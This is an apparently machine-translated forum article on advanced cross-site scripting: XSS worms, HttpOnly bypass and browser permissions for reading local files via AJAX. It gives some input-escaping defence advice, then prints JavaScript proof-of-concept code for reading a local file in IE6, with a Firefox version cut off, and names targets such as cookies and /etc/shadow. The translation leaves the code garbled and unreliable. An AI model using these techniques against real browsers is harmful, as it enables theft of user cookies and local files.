Summary of the advanced usage of XSS-worms, HTTP-only, AJAX local file operations, image web pages

By racle@tian6.com
Http://bbs.tian6.com/thread-12711-1-1.html
Repost Copyright

 

------------------------------------------- Preface ---------------------------------------------------------

This article will show you how to insert XSS statements without errors, how to filter and bypass XSS statements, and CSRF. in other words, you must have a certain degree of XSS knowledge to understand this article.

If you do not have basic XSS knowledge, read the following articles:
Http://www.lib.tsinghua.edu.cn/chinese/INTERNET/JavaScript/ JavaScript
Http://www.google.com/search? Q = XSS + % D3 % EF % BE % E4 XSS statement Daquan
Http://www.google.com/search? Q = XSS + % C8 % C6 % B9 % fd xss statement Bypass
FLASH http://www.80vul.com/dzvul/sodb/03/sodb-2008-03.txt CSRF
The http://bbs.tian6.com/thread-12239-1-1.html breaks through the limit on the number of XSS characters to execute arbitrary JS Code
Http://bbs.tian6.com/thread-12241-1-1.html uses window reference vulnerability and XSS vulnerability to realize browser hijacking

 

If the content in this article seems strange to you, hard to understand, or tasteless, it means you have little knowledge about XSS.

We hope that Tianyang members will truly learn and master every security technology in the spirit of technology learning. therefore, if you come to Tianyang because you want to learn something, please calm down, understand, see through, and test it. your ability to control XSS is naturally greatly improved.

If you think that XSS is insignificant, it is just a common pop-up window, or you think that the XSS scope is narrow, or you think that the XSS power is insignificant, take a look at the following snippet: twitter suffered 6 times of XSS worms,

The Baidu xss worm has infected more than 8700 blogs. The media has a great influence and a great deal of attention.

Qq zone. XSS has been infected with qq zone.

The owasp myspace xss worm infected 1 million users within 20 hours, resulting in MySpace Paralysis

..........
Copy the code ---------------------------------------- introduction -------------------------------------------------------------

What is XSS? XSS, also known as CSS (Cross Site Script), is a Cross-Site scripting attack. A malicious attacker inserts malicious html code into a Web page. When a user browses this page, the html code embedded in the Web page is executed, to achieve the Special Purpose of malicious users. XSS is a passive attack, because it is passive and not easy to use, so many people often call it harmful.

 

There are multiple methods for Cross-Site attacks. The HTML language allows simple interaction using scripts, intruders insert a malicious HTML code into a page through technical means, such as recording the user information stored in the Forum (Cookie). Because the Cookie stores the complete user name and password information, users will suffer Security losses. of course, Attackers sometimes add some parameters to the webpage. JS or. when VBS is the code with the last name, we will also be attacked when browsing.

 

We will not discuss how to find out, how to bypass various restrictions, and successfully execute XSS code without errors here. There are many related articles on the Internet.
Copy code now XSS replaces SQL-INJECTION and becomes the first security issue of web security. XSS has become an important subject of WEB security.
Here we will focus on the following issues:

1. What can we achieve through XSS?

2. How to Protect COOKIES through HTTP-only and how to break through HTTP-only and remedy them?

3 is the feasibility of advanced XSS exploitation and advanced integrated XSS worm?

4. How can XSS vulnerabilities be avoided in terms of output and input.

 

------------------------------------------ Study subject ----------------------------------------------------------

 

What can we achieve through XSS? Through XSS, we can obtain the user's COOKIES and other information, simulate the user's own HTTP submission, read local client files, and cheat social engineering. Combined with the above functions, we can also write comprehensive advanced worms.
Copy code XSS advanced exploitation and comprehensive XSS advanced worms: we mainly discuss XSS permission restrictions in different browsers & XSS screenshots; image web pages, http only bypass (Cross-Site Tracing XST ). write our own advanced XSS Worm
Copy code XSS vulnerabilities can be avoided in terms of output and input.
1: The dynamic pages of the website are classified into security levels, key areas and secondary key areas, and different input restrictions are adopted for different levels.
2: strictly control the input type. Select numbers, characters, and special formats as required.
3: HTML special characters are escaped during browser output. htmlspecialchars and htmlentities are commonly used. however, filtering out special characters does not mean security. many bypass Methods compete for pure filtering, such as URL, octal, hexadecimal, and String. fromCharCode to code, UBB bypass, etc. therefore, each part should be audited by dynamic input code.
4: Http-only can be used as one of the COOKIES protection methods.

 

 

(I) Local file operation permissions of AJAX in different browsers: (read local COOKIES, common sensitive files such as FTP INI, etc/shadow, sensitive files of various third-party applications, and content feedback to attackers)

We can refer to two articles about emptiness and the xeye team statistics: 1: ie6 can read unrestricted local files. ie8 and the corresponding version of the trident kernel browser control the permissions of local ajax execution, it seems that MS attaches great importance to security risks such as IE. (This has some problems and will be corrected later !)

 

2: ff 3.0.8 and earlier versions allow locally executed ajax to access the file content in the current directory. Other directories cannot be accessed.

 

3: opera9.64 and earlier versions allow access by specifying the file url as the file: // protocol. If the file is in the current directory, you do not need to specify the file: // protocol; if the file is on the same drive letter, it can be accessed in a way that exceeds the Directory :.. /.. /boot. ini.

 

4: Based on the webkit kernel: google chrome, travel 3.0, safari and other browsers do not have any access restrictions on local ajax permissions.
Copy the code IE6 and use ajax to read local files <script>

Function $ (x) {return document. getElementById (x )}

 

Function ajax_obj (){

Var request = false;

If (window. XMLHttpRequest ){

Request = new XMLHttpRequest ();

} Else if (window. ActiveXObject ){

Var versions = [Microsoft. XMLHTTP, MSXML. XMLHTTP, Microsoft. XMLHTTP, Msxml2.XMLHTTP. 7.0, Msxml2.XMLHTTP. 6.0, Msxml2.XMLHTTP. 5.0,

 

Msxml2.XMLHTTP. 4.0, MSXML2.XMLHTTP. 3.0, MSXML2.XMLHTTP];

For (var I = 0; I <versions. length; I ++ ){

Try {

Request = new ActiveXObject (versions [I]);

} Catch (e ){}

}

}

Return request;

}

Var _ x = ajax_obj ();

Function _ 7or3 (_ m, action, argv ){

_ X. open (_ m, action, false );

If (_ m = "POST") _ x. setRequestHeader ("Content-Type", "application/x-www-form-urlencoded ");

_ X. send (argv );

Return _ x. responseText;

}

 

Var txt = _ 7or3 ("GET", "file: // localhost/C:/11.txt", null );

Alert (txt );

 

</Script>
Copy the code FIREFOX 3 and use ajax to read local files. Only files in the same directory and their subordinate directories can be read. <script>

Function $ (x) {return document. getElementById (x )}

 

Function ajax_obj (){

Var request = false;

If (window. XMLHttpRequest ){

Request = new XMLHttpRequest ();

} Else if (window. ActiveXObject ){

Var versions = [Microsoft. XMLHTTP, MSXML. XMLHTTP, Microsoft. XMLHTTP, Msxml2.XMLHTTP. 7.0, Msxml2.XMLHTTP. 6.0, Msxml2.XMLHTTP. 5.0,

 

& N